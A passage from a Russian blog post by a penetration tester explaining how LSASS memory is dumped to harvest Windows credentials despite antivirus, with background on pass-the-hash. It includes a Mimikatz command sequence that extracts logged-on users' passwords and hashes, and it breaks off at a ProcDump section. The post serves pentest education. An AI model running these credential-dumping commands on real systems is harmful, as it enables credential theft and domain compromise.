{"id":332456,"date":"2022-04-26T15:01:08","date_gmt":"2022-04-26T15:01:08","guid":{"rendered":"http:\/\/savepearlharbor.com\/?p=332456"},"modified":"-0001-11-30T00:00:00","modified_gmt":"-0001-11-29T21:00:00","slug":"","status":"publish","type":"post","link":"https:\/\/savepearlharbor.com\/?p=332456","title":{"rendered":"<span>\u0414\u0430\u043c\u043f\u044b LSASS \u0434\u043b\u044f \u0432\u0441\u0435\u0445, \u0434\u0430\u0440\u043e\u043c, \u0438 \u043f\u0443\u0441\u0442\u044c \u043d\u0438\u043a\u0442\u043e \u043d\u0435 \u0443\u0439\u0434\u0435\u0442 \u043e\u0431\u0438\u0436\u0435\u043d\u043d\u044b\u0439<\/span>"},"content":{"rendered":"<div><\/div>\n<div id=\"post-content-body\">\n<div>\n<div class=\"article-formatted-body article-formatted-body article-formatted-body_version-2\">\n<div xmlns=\"http:\/\/www.w3.org\/1999\/xhtml\">\n<figure class=\"full-width\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w780q1\/getpro\/habr\/upload_files\/b64\/a70\/586\/b64a70586c7f6473b7094b3fbb1b06d3.jpg\" width=\"780\" height=\"440\" data-src=\"https:\/\/habrastorage.org\/getpro\/habr\/upload_files\/b64\/a70\/586\/b64a70586c7f6473b7094b3fbb1b06d3.jpg\" data-blurred=\"true\"\/><figcaption><\/figcaption><\/figure>\n<p>\u0417\u0434\u0440\u0430\u0432\u0441\u0442\u0432\u0443\u0439\u0442\u0435, \u0445\u0430\u0431\u0440\u043e\u043b\u044e\u0434\u0438!<\/p>\n<p>\u041c\u0435\u043d\u044f \u0437\u043e\u0432\u0443\u0442 <a class=\"mention\" href=\"\/users\/snovvcrash\">@snovvcrash<\/a>, \u0438 \u044f \u0440\u0430\u0431\u043e\u0442\u0430\u044e \u0432 \u043e\u0442\u0434\u0435\u043b\u0435 \u0430\u043d\u0430\u043b\u0438\u0437\u0430 \u0437\u0430\u0449\u0438\u0449\u0435\u043d\u043d\u043e\u0441\u0442\u0438 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0438 Angara Security. \u041e\u0442\u0432\u0435\u0447\u0430\u044e \u044f, \u0437\u043d\u0430\u0447\u0438\u0442\u0441\u044f, \u0437\u0430 \u0438\u043d\u0444\u0440\u0430\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u043d\u044b\u0439 \u043f\u0435\u043d\u0442\u0435\u0441\u0442, \u0438 \u0432 \u044d\u0442\u043e\u0439 \u0441\u0442\u0430\u0442\u044c\u0435 \u044f \u0445\u043e\u0442\u0435\u043b \u0431\u044b \u043f\u043e\u0433\u043e\u0432\u043e\u0440\u0438\u0442\u044c \u043e\u0431 \u043e\u0434\u043d\u043e\u043c \u0438\u0437 \u0441\u0430\u043c\u044b\u0445 \u044d\u0444\u0444\u0435\u043a\u0442\u0438\u0432\u043d\u044b\u0445 \u043c\u0435\u0442\u043e\u0434\u043e\u0432 \u0434\u043e\u0431\u044b\u0447\u0438 \u0443\u0447\u0435\u0442\u043d\u044b\u0445 \u0434\u0430\u043d\u043d\u044b\u0445 \u043d\u0430 \u00ab\u0432\u043d\u0443\u0442\u0440\u044f\u043a\u0435\u00bb \u2014 \u0438\u0437\u0432\u043b\u0435\u0447\u0435\u043d\u0438\u0438 \u0441\u0435\u043a\u0440\u0435\u0442\u043e\u0432 \u0438\u0437 \u043f\u0430\u043c\u044f\u0442\u0438 \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u0430 lsass.exe (MITRE ATT&amp;CK <a href=\"https:\/\/attack.mitre.org\/techniques\/T1003\/001\/\">T1003.001<\/a>) \u2014 \u0438, \u0432 \u0447\u0430\u0441\u0442\u043d\u043e\u0441\u0442\u0438, \u043e\u0431 \u043e\u0441\u043e\u0431\u0435\u043d\u043d\u043e\u0441\u0442\u044f\u0445 \u0440\u0435\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u0438 \u044d\u0442\u043e\u0433\u043e \u043c\u0435\u0442\u043e\u0434\u0430 \u0432 \u0440\u0443-\u0441\u0435\u0433\u043c\u0435\u043d\u0442\u0435 \u0442\u0435\u0441\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u044f \u043d\u0430 \u043f\u0440\u043e\u043d\u0438\u043a\u043d\u043e\u0432\u0435\u043d\u0438\u0435.<\/p>\n<p>\u0417\u0430 \u0434\u0432\u0430 \u0433\u043e\u0434\u0430 \u0440\u0430\u0431\u043e\u0442\u044b \u043f\u0435\u043d\u0442\u0435\u0441\u0442\u0435\u0440\u043e\u043c \u043c\u043e\u0438 \u043d\u0435\u0440\u0432\u044b \u0431\u044b\u043b\u0438 \u0438\u0437\u0440\u044f\u0434\u043d\u043e \u043f\u043e\u0442\u0440\u0435\u043f\u0430\u043d\u044b \u043d\u0430\u0448\u0438\u043c \u043b\u044e\u0431\u0438\u043c\u044b\u043c \u043e\u0442\u0435\u0447\u0435\u0441\u0442\u0432\u0435\u043d\u043d\u044b\u043c \u0430\u043d\u0442\u0438\u0432\u0438\u0440\u0443\u0441\u043d\u044b\u043c \u0440\u0435\u0448\u0435\u043d\u0438\u0435\u043c Kaspersky Endpoint Security (\u0434\u0430\u043b\u0435\u0435 \u2014 KES), \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043b\u0435\u043d \u0443 \u043a\u0430\u0436\u0434\u043e\u0433\u043e <s>\u043f\u0435\u0440\u0432\u043e\u0433\u043e<\/s> \u0432\u0442\u043e\u0440\u043e\u0433\u043e \u043d\u0430\u0448\u0435\u0433\u043e \u043a\u043b\u0438\u0435\u043d\u0442\u0430, \u0438 \u043a\u043e\u0442\u043e\u0440\u044b\u0439, \u0432 \u043e\u0442\u043b\u0438\u0447\u0438\u0435 \u043e\u0442 \u0434\u0440\u0443\u0433\u0438\u0445 \u0441\u0440\u0435\u0434\u0441\u0442\u0432 \u0430\u043d\u0442\u0438\u0432\u0438\u0440\u0443\u0441\u043d\u043e\u0439 \u0437\u0430\u0449\u0438\u0442\u044b, \u043d\u0430\u0433\u043b\u0443\u0445\u043e \u0431\u043b\u043e\u043a\u0438\u0440\u0443\u0435\u0442 \u0432\u0441\u0435 \u043f\u043e\u043f\u044b\u0442\u043a\u0438 \u043f\u043e\u0442\u0435\u043d\u0446\u0438\u0430\u043b\u044c\u043d\u043e\u0433\u043e \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430 \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u0434\u043e\u0441\u0442\u0443\u043f \u043a lsass.exe (\u043d\u0435 \u0440\u0435\u043a\u043b\u0430\u043c\u0430!).<\/p>\n<p>\u0414\u0430\u043b\u0435\u0435 \u044f \u0440\u0430\u0441\u0441\u043a\u0430\u0436\u0443 \u0441\u0432\u043e\u0439 \u043e\u043f\u044b\u0442 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u044f \u0438 \u043a\u0430\u0441\u0442\u043e\u043c\u0438\u0437\u0430\u0446\u0438\u0438 \u043f\u0443\u0431\u043b\u0438\u0447\u043d\u043e \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u044b\u0445 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u043e\u0432, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0432 \u0440\u0430\u0437\u043d\u044b\u0435 \u043f\u0440\u043e\u043c\u0435\u0436\u0443\u0442\u043a\u0438 \u0432\u0440\u0435\u043c\u0435\u043d\u0438 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u043b\u0438 \u043c\u043d\u0435 \u0441\u0434\u0430\u043c\u043f\u0438\u0442\u044c \u043f\u0430\u043c\u044f\u0442\u044c LSASS \u043f\u0440\u0438 \u0430\u043a\u0442\u0438\u0432\u043d\u043e\u043c \u00ab\u041a\u0430\u0441\u043f\u0435\u0440\u0441\u043a\u043e\u043c\u00bb. \u041f\u043e\u0433\u043d\u0430\u043b\u0438!<\/p>\n<p><a class=\"anchor\"><\/a><\/p>\n<h2>\u041a\u0440\u0430\u0442\u043a\u0438\u0439 \u043b\u0438\u043a\u0431\u0435\u0437<\/h2>\n<p>\u0415\u0441\u043b\u0438 \u043d\u0435 \u0441\u0438\u043b\u044c\u043d\u043e \u0443\u0433\u043b\u0443\u0431\u043b\u044f\u0442\u044c\u0441\u044f \u0432 \u0442\u0435\u043e\u0440\u0438\u044e, \u0442\u043e Local Security Authority Subsystem Service (\u043e\u043d \u0436\u0435 LSASS) \u2014 \u044d\u0442\u043e \u043f\u0440\u043e\u0446\u0435\u0441\u0441 (\u0438\u0441\u043f\u043e\u043b\u043d\u044f\u0435\u043c\u044b\u0439 \u0444\u0430\u0439\u043b <code>C:\\Windows\\System32\\lsass.exe<\/code>), \u043e\u0442\u0432\u0435\u0442\u0441\u0442\u0432\u0435\u043d\u043d\u044b\u0439 \u0437\u0430 \u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0435 \u0440\u0430\u0437\u043d\u044b\u043c\u0438 \u043f\u043e\u0434\u0441\u0438\u0441\u0442\u0435\u043c\u0430\u043c\u0438 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438 \u041e\u0421 Windows. \u0421\u0440\u0435\u0434\u0438 \u0435\u0433\u043e \u0437\u0430\u0434\u0430\u0447: \u043f\u0440\u043e\u0432\u0435\u0440\u043a\u0430 \u00ab\u043a\u0440\u0435\u0434\u00bb \u043b\u043e\u043a\u0430\u043b\u044c\u043d\u044b\u0445 \u0438 \u0434\u043e\u043c\u0435\u043d\u043d\u044b\u0445 \u0430\u043a\u043a\u0430\u0443\u043d\u0442\u043e\u0432 \u0432 \u0445\u043e\u0434\u0435 \u0440\u0430\u0437\u043b\u0438\u0447\u043d\u044b\u0445 \u0441\u0446\u0435\u043d\u0430\u0440\u0438\u0435\u0432 \u0437\u0430\u043f\u0440\u043e\u0441\u0430 \u0434\u043e\u0441\u0442\u0443\u043f\u0430 \u043a \u0441\u0438\u0441\u0442\u0435\u043c\u0435, \u0433\u0435\u043d\u0435\u0440\u0430\u0446\u0438\u044f \u0442\u043e\u043a\u0435\u043d\u043e\u0432 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 \u0434\u043b\u044f \u0430\u043a\u0442\u0438\u0432\u043d\u044b\u0445 \u0441\u0435\u0441\u0441\u0438\u0439 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439, \u0440\u0430\u0431\u043e\u0442\u0430 \u0441 \u043f\u0440\u043e\u0432\u0430\u0439\u0434\u0435\u0440\u0430\u043c\u0438 \u043f\u043e\u0434\u0434\u0435\u0440\u0436\u043a\u0438 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 (Security Support Provider, SSP) \u0438 \u0434\u0440.<\/p>\n<p>\u0414\u043b\u044f \u043d\u0430\u0441, \u043a\u0430\u043a \u0434\u043b\u044f \u044d\u0442\u0438\u0447\u043d\u044b\u0445 \u0445\u0430\u043a\u0435\u0440\u043e\u0432, \u043a\u043b\u044e\u0447\u0435\u0432\u044b\u043c \u0437\u043d\u0430\u0447\u0435\u043d\u0438\u0435\u043c \u043e\u0431\u043b\u0430\u0434\u0430\u0435\u0442 \u0442\u043e\u0442 \u0444\u0430\u043a\u0442, \u0447\u0442\u043e \u0432 \u0434\u043e\u043c\u0435\u043d\u0435 Active Directory \u043f\u0440\u0430\u0432\u0438\u0442 \u043a\u043e\u043d\u0446\u0435\u043f\u0446\u0438\u044f \u0435\u0434\u0438\u043d\u043e\u0433\u043e \u0432\u0445\u043e\u0434\u0430 Single Sign-On (SSO), \u0431\u043b\u0430\u0433\u043e\u0434\u0430\u0440\u044f \u043a\u043e\u0442\u043e\u0440\u043e\u0439 \u043f\u0440\u043e\u0446\u0435\u0441\u0441 lsass.exe \u0445\u0440\u0430\u043d\u0438\u0442 \u0432 \u0441\u0435\u0431\u0435 \u0440\u0430\u0437\u043d\u044b\u0435 \u043c\u0430\u0442\u0435\u0440\u0438\u0430\u043b\u044b \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438 \u0437\u0430\u043b\u043e\u0433\u0438\u043d\u0435\u043d\u043d\u044b\u0445 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439, \u043d\u0430\u043f\u0440\u0438\u043c\u0435\u0440, NT-\u0445\u0435\u0448\u0438 \u0438 \u0431\u0438\u043b\u0435\u0442\u044b Kerberos, \u0447\u0442\u043e\u0431\u044b \u00ab\u043f\u043e\u043b\u044c\u0437\u0430\u043a\u0443\u00bb \u043d\u0435 \u043f\u0440\u0438\u0445\u043e\u0434\u0438\u043b\u043e\u0441\u044c \u043f\u0435\u0447\u0430\u0442\u0430\u0442\u044c \u0441\u0432\u043e\u0439 \u043f\u0430\u0440\u043e\u043b\u042a \u0432 \u0432\u044b\u043b\u0435\u0437\u0430\u044e\u0449\u0435\u043c \u043d\u0430 \u044d\u043a\u0440\u0430\u043d\u0435 \u043e\u043a\u043e\u0448\u043a\u0435 \u043a\u0430\u0436\u0434\u044b\u0435 5 \u043c\u0438\u043d\u0443\u0442. \u0412 \u00ab\u043b\u0443\u0447\u0448\u0438\u0435\u00bb \u0432\u0440\u0435\u043c\u0435\u043d\u0430 \u0438\u0437 LSASS \u043c\u043e\u0436\u043d\u043e \u0431\u044b\u043b\u043e \u043f\u043e\u0442\u0430\u0449\u0438\u0442\u044c <strong>\u043f\u0430\u0440\u043e\u043b\u0438 \u0432 \u043e\u0442\u043a\u0440\u044b\u0442\u043e\u043c \u0432\u0438\u0434\u0435<\/strong> \u0432 \u0441\u0438\u043b\u0443 \u0430\u043a\u0442\u0438\u0432\u043d\u043e\u0441\u0442\u0438 \u043f\u0440\u043e\u0442\u043e\u043a\u043e\u043b\u0430 WDigest (HTTP \u0434\u0430\u0439\u0434\u0436\u0435\u0441\u0442-\u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u044f), \u043d\u043e \u043d\u0430\u0447\u0438\u043d\u0430\u044f \u0441 \u0432\u0435\u0440\u0441\u0438\u0438 \u041e\u0421 Windows Server 2008 R2 \u0432\u0435\u043d\u0434\u043e\u0440 \u0440\u0435\u0448\u0438\u043b \u043d\u0435 \u0432\u043a\u043b\u044e\u0447\u0430\u0442\u044c \u044d\u0442\u043e\u0442 \u043c\u0435\u0445\u0430\u043d\u0438\u0437\u043c \u043f\u043e \u0443\u043c\u043e\u043b\u0447\u0430\u043d\u0438\u044e.<\/p>\n<p>\u041d\u0435\u0441\u043c\u043e\u0442\u0440\u044f \u043d\u0430 \u0442\u043e, \u0447\u0442\u043e \u0432 2\u043a22 \u043f\u0440\u0438 \u0443\u0441\u043f\u0435\u0448\u043d\u043e\u043c \u0434\u0430\u043c\u043f\u0435 LSASS \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0443 \u0447\u0430\u0449\u0435 \u0432\u0441\u0435\u0433\u043e \u043e\u0441\u0442\u0430\u0435\u0442\u0441\u044f \u0434\u043e\u0432\u043e\u043b\u044c\u0441\u0442\u0432\u043e\u0432\u0430\u0442\u044c\u0441\u044f NT-\u0445\u0435\u0448\u0430\u043c\u0438 \u0438 \u0431\u0438\u043b\u0435\u0442\u0430\u043c\u0438 Kerberos, \u044d\u0442\u043e \u0432\u0441\u0435 \u0440\u0430\u0432\u043d\u043e \u0441 \u0431\u043e\u043b\u044c\u0448\u043e\u0439 \u0432\u0435\u0440\u043e\u044f\u0442\u043d\u043e\u0441\u0442\u044c\u044e \u043f\u043e\u0437\u0432\u043e\u043b\u0438\u0442 \u0435\u043c\u0443 \u043f\u043e\u0432\u044b\u0441\u0438\u0442\u044c \u0441\u0432\u043e\u0438 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0438 \u0432 \u0434\u043e\u043c\u0435\u043d\u043d\u043e\u0439 \u0441\u0440\u0435\u0434\u0435 AD \u0437\u0430 \u043a\u043e\u0440\u043e\u0442\u043a\u0438\u0439 \u043f\u0440\u043e\u043c\u0435\u0436\u0443\u0442\u043e\u043a \u0432\u0440\u0435\u043c\u0435\u043d\u0438. \u0420\u0435\u0430\u043b\u0438\u0437\u0443\u044f \u0441\u0445\u0435\u043c\u044b <a href=\"https:\/\/attack.mitre.org\/techniques\/T1550\/002\/\">Pass-the-Hash<\/a>, <a href=\"https:\/\/stealthbits.com\/blog\/how-to-detect-overpass-the-hash-attacks\/\">Overpass-the-Hash<\/a> \u0438 <a href=\"https:\/\/attack.mitre.org\/techniques\/T1550\/003\/\">Pass-the-Ticket<\/a>, \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a \u043c\u043e\u0436\u0435\u0442 \u0431\u044b\u0441\u0442\u0440\u043e \u0440\u0430\u0441\u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u0438\u0442\u044c\u0441\u044f \u043f\u043e \u0441\u0435\u0442\u0438 \u0433\u043e\u0440\u0438\u0437\u043e\u043d\u0442\u0430\u043b\u044c\u043d\u043e, \u0441\u043e\u0431\u0438\u0440\u0430\u044f \u043f\u043e \u043f\u0443\u0442\u0438 \u0432\u0441\u0435 \u0431\u043e\u043b\u044c\u0448\u0435 \u0445\u0435\u0448\u0435\u0439 \u0438 \u00ab\u0442\u0438\u043a\u0435\u0442\u043e\u0432\u00bb, \u0447\u0442\u043e \u0432 \u043a\u043e\u043d\u0435\u0447\u043d\u043e\u043c \u0438\u0442\u043e\u0433\u0435 \u0434\u0430\u0440\u0443\u0435\u0442 \u0435\u043c\u0443 \u00ab\u043a\u043b\u044e\u0447\u0438 \u043e\u0442 \u041a\u043e\u0440\u043e\u043b\u0435\u0432\u0441\u0442\u0432\u0430\u00bb \u0432 \u0432\u0438\u0434\u0435 \u0434\u0430\u043d\u043d\u044b\u0445 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438 \u0430\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440\u0430 \u0434\u043e\u043c\u0435\u043d\u0430.<\/p>\n<h2>\u042d\u043a\u0441\u043a\u0443\u0440\u0441 \u0432 \u0438\u0441\u0442\u043e\u0440\u0438\u044e \u0434\u0430\u043c\u043f\u043e\u0432 LSASS<\/h2>\n<p>\u0420\u0430\u0441\u0441\u043c\u043e\u0442\u0440\u0438\u043c \u043f\u0435\u0440\u0432\u043e\u043f\u0440\u043e\u0445\u043e\u0434\u0446\u0435\u0432 \u0432 \u0440\u0435\u043c\u0435\u0441\u043b\u0435 \u0438\u0437\u0432\u043b\u0435\u0447\u0435\u043d\u0438\u044f \u0434\u0430\u043d\u043d\u044b\u0445 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438 \u0438\u0437 \u043f\u0430\u043c\u044f\u0442\u0438 LSASS.<\/p>\n<h3>Mimikatz<\/h3>\n<p>\u0411\u044b\u043b\u043e \u0431\u044b \u043f\u0440\u0435\u0441\u0442\u0443\u043f\u043b\u0435\u043d\u0438\u0435\u043c \u043d\u0435 \u043d\u0430\u0447\u0430\u0442\u044c \u043f\u043e\u0432\u0435\u0441\u0442\u0432\u043e\u0432\u0430\u043d\u0438\u0435 \u0441 \u0442\u0430\u043a\u043e\u0433\u043e \u043c\u0430\u0441\u0442\u043e\u0434\u043e\u043d\u0442\u0430 \u0432 \u043e\u0431\u043b\u0430\u0441\u0442\u0438 \u043f\u043e\u0442\u0440\u043e\u0448\u0435\u043d\u0438\u044f \u043f\u043e\u0434\u0441\u0438\u0441\u0442\u0435\u043c \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438 Windows \u043a\u0430\u043a <a href=\"https:\/\/github.com\/gentilkiwi\/mimikatz\">Mimikatz<\/a>, \u043a\u043e\u0442\u043e\u0440\u044b\u043c \u0445\u043e\u0442\u044c \u0440\u0430\u0437 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b\u0441\u044f \u043b\u044e\u0431\u043e\u0439 \u043f\u0435\u043d\u0442\u0435\u0441\u0442\u0435\u0440.<\/p>\n<p>\u041c\u043e\u0434\u0443\u043b\u044c <code>sekurlsa::logonpasswords<\/code> \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u00ab\u043d\u0430\u043b\u0435\u0442\u0443\u00bb \u043f\u0430\u0440\u0441\u0438\u0442\u044c \u043f\u0430\u043c\u044f\u0442\u044c lsass.exe \u0441 \u0446\u0435\u043b\u044c\u044e \u043f\u043e\u0438\u0441\u043a\u0430 \u0441\u0435\u043a\u0440\u0435\u0442\u0438\u043a\u043e\u0432 \u0431\u0435\u0437 \u0441\u043e\u0445\u0440\u0430\u043d\u0435\u043d\u0438\u044f \u0441\u043e\u043e\u0442\u0432\u0435\u0442\u0441\u0442\u0432\u0443\u044e\u0449\u0435\u0433\u043e \u0434\u0430\u043c\u043f\u0430 \u043d\u0430 \u0434\u0438\u0441\u043a. \u042d\u0442\u043e\u0442 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442 \u043f\u043e\u0438\u0441\u0442\u0438\u043d\u0435 \u043f\u0440\u043e\u0438\u0437\u0432\u0435\u043b \u0440\u0435\u0432\u043e\u043b\u044e\u0446\u0438\u044e \u0432 \u043d\u0430\u0441\u0442\u0443\u043f\u0430\u0442\u0435\u043b\u044c\u043d\u044b\u0445 \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u044f\u0445 \u0438 \u043f\u043e\u043b\u043e\u0436\u0438\u043b \u043d\u0430\u0447\u0430\u043b\u043e \u043c\u043d\u043e\u0433\u0438\u043c \u0434\u0440\u0443\u0433\u0438\u043c \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u0435\u043c \u0432 \u043e\u0431\u043b\u0430\u0441\u0442\u0438 \u0438\u0437\u0432\u043b\u0435\u0447\u0435\u043d\u0438\u044f \u0447\u0443\u0432\u0441\u0442\u0432\u0438\u0442\u0435\u043b\u044c\u043d\u043e\u0439 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438 \u0441 \u0445\u043e\u0441\u0442\u043e\u0432 \u043f\u043e\u0434 \u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0435\u043c Windows.<\/p>\n<details class=\"spoiler\">\n<summary>Cmd<\/summary>\n<div class=\"spoiler__content\">\n<pre><code>C:\\>mimikatz.exe mimikatz # privilege::debug mimikatz # token::elevate mimikatz # log out.txt mimikatz # sekurlsa::logonpasswords full mimikatz # exit  C:\\>mimikatz.exe \"privilege::debug\" \"token::elevate\" \"log out.txt\" \"sekurlsa::logonpasswords full\" \"exit\"<\/code><\/pre>\n<\/p>\n<\/div>\n<\/details>\n<figure class=\"full-width\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/658\/254\/f4a\/658254f4a5f9f5a7b9cbbbe80dd4db72.png\" alt=\"\u0418\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435 Mimikatz (logonpasswords)\" title=\"\u0418\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435 Mimikatz (logonpasswords)\" width=\"1174\" height=\"855\" data-src=\"https:\/\/habrastorage.org\/getpro\/habr\/upload_files\/658\/254\/f4a\/658254f4a5f9f5a7b9cbbbe80dd4db72.png\"\/><figcaption>\u0418\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435 Mimikatz (logonpasswords)<\/figcaption><\/figure>\n<p>\u041a \u0441\u043e\u0436\u0430\u043b\u0435\u043d\u0438\u044e \u0434\u043b\u044f \u043f\u0435\u043d\u0442\u0435\u0441\u0442\u0435\u0440\u043e\u0432, \u0432\u0435\u043d\u0434\u043e\u0440\u044b <abbr title=\"Antivirus\" type=\"abbr\">AV<\/abbr> \/ <abbr title=\"Endpoint Detection &amp; Response\" type=\"abbr\">EDR <\/abbr>\u0431\u044b\u0441\u0442\u0440\u043e \u00ab\u043f\u0440\u043e\u0441\u0435\u043a\u043b\u0438 \u0444\u0438\u0448\u043a\u0443\u00bb \u0438 \u0441\u0442\u0430\u043b\u0438 \u043e\u0442\u043d\u043e\u0441\u0438\u0442\u044c\u0441\u044f \u043a \u00ab\u041c\u0438\u043c\u0438\u043a\u0443\u00bb <strong>&lt;sarkazm><\/strong>\u043a\u0430\u043a \u043a \u0441\u0430\u043c\u043e\u043c\u0443 \u043e\u043f\u0430\u0441\u043d\u043e\u043c\u0443 \u041f\u041e, \u0441\u043e\u0437\u0434\u0430\u043d\u043d\u043e\u043c\u0443 \u0437\u0430 \u0432\u0441\u044e \u0438\u0441\u0442\u043e\u0440\u0438\u044e \u0447\u0435\u043b\u043e\u0432\u0435\u0447\u0435\u0441\u0442\u0432\u0430<strong>&lt;\/sarkazm><\/strong>, \u043f\u043e\u044d\u0442\u043e\u043c\u0443 \u043d\u0430 \u0441\u0435\u0433\u043e\u0434\u043d\u044f\u0448\u043d\u0438\u0439 \u043c\u043e\u043c\u0435\u043d\u0442 \u043e\u043d \u043f\u0440\u0438\u0433\u043e\u0434\u0435\u043d \u043b\u0438\u0448\u044c \u043a\u0430\u043a \u043f\u043e\u0441\u043e\u0431\u0438\u0435 \u0434\u043b\u044f \u0438\u0437\u0443\u0447\u0435\u043d\u0438\u044f \u0440\u0435\u0430\u043b\u0438\u0437\u043e\u0432\u0430\u043d\u043d\u044b\u0445 \u0432 \u043d\u0435\u043c \u0442\u0435\u0445\u043d\u0438\u043a \u2014 \u0434\u043b\u044f \u0438\u0445 \u043f\u0435\u0440\u0435\u043e\u0441\u043c\u044b\u0441\u043b\u0435\u043d\u0438\u044f \u0438 \u043f\u0435\u0440\u0435\u0438\u0437\u043e\u0431\u0440\u0435\u0442\u0435\u043d\u0438\u044f \u0432 \u0441\u043e\u0431\u0441\u0442\u0432\u0435\u043d\u043d\u044b\u0445 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u0430\u0445.<\/p>\n<blockquote>\n<p>\u041d\u0430 \u0437\u0430\u043c\u0435\u0442\u043a\u0443: \u043e\u0444\u0438\u0446\u0438\u0430\u043b\u044c\u043d\u0430\u044f <a href=\"https:\/\/github.com\/gentilkiwi\/mimikatz\/wiki\">\u0432\u0438\u043a\u0438<\/a> Mimikatz \u043f\u043e\u043a\u0440\u044b\u0432\u0430\u0435\u0442 \u0434\u0430\u043b\u0435\u043a\u043e \u043d\u0435 \u0432\u0441\u0435 \u0435\u0433\u043e \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u0438, \u043f\u043e\u044d\u0442\u043e\u043c\u0443 \u044d\u043d\u0442\u0443\u0437\u0438\u0430\u0441\u0442\u044b InfoSec-\u043a\u043e\u043c\u044c\u044e\u043d\u0438\u0442\u0438 \u0441\u043e\u0437\u0434\u0430\u043b\u0438 \u0432\u043e\u0442 <a href=\"https:\/\/tools.thehacker.recipes\/mimikatz\">\u0442\u0430\u043a\u043e\u0439<\/a> \u0437\u0430\u043c\u0435\u0447\u0430\u0442\u0435\u043b\u044c\u043d\u044b\u0439 \u0440\u0435\u0441\u0443\u0440\u0441, \u043a\u043e\u0442\u043e\u0440\u044b\u043c \u044f \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0443\u044e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c\u0441\u044f \u0432 \u0441\u043b\u0443\u0447\u0430\u0435 \u0432\u043e\u0437\u043d\u0438\u043a\u043d\u043e\u0432\u0435\u043d\u0438\u044f \u0432\u043e\u043f\u0440\u043e\u0441\u043e\u0432, \u0447\u0442\u043e \u0434\u0435\u043b\u0430\u0435\u0442 \u0442\u0430 \u0438\u043b\u0438 \u0438\u043d\u0430\u044f \u043a\u043e\u043c\u0430\u043d\u0434\u0430 \u044d\u0442\u043e\u0433\u043e \u0437\u0430\u043c\u0435\u0447\u0430\u0442\u0435\u043b\u044c\u043d\u043e\u0433\u043e \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u0430.<\/p>\n<\/blockquote>\n<h3>ProcDump<\/h3>\n<p>\u0414\u0440\u0443\u0433\u0438\u043c \u0444\u0430\u0432\u043e\u0440\u0438\u0442\u043e\u043c \u0432\u043d\u0443\u0442\u0440\u0435\u043d\u043d\u0438\u0445 \u043f\u0435\u043d\u0442\u0435\u0441\u0442\u043e\u0432 \u0434\u043e\u043b\u0433\u043e\u0435 \u0432\u0440\u0435\u043c\u044f \u0431\u044b\u043b \u043c\u0435\u0442\u043e\u0434 \u0441\u043e\u0437\u0434\u0430\u043d\u0438\u044f \u0441\u043d\u0438\u043c\u043a\u0430 \u043f\u0430\u043c\u044f\u0442\u0438 LSASS \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u0441\u043b\u0443\u0436\u0435\u0431\u043d\u043e\u0439 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u044b <a href=\"https:\/\/docs.microsoft.com\/en-us\/sysinternals\/downloads\/procdump\">ProcDump<\/a> 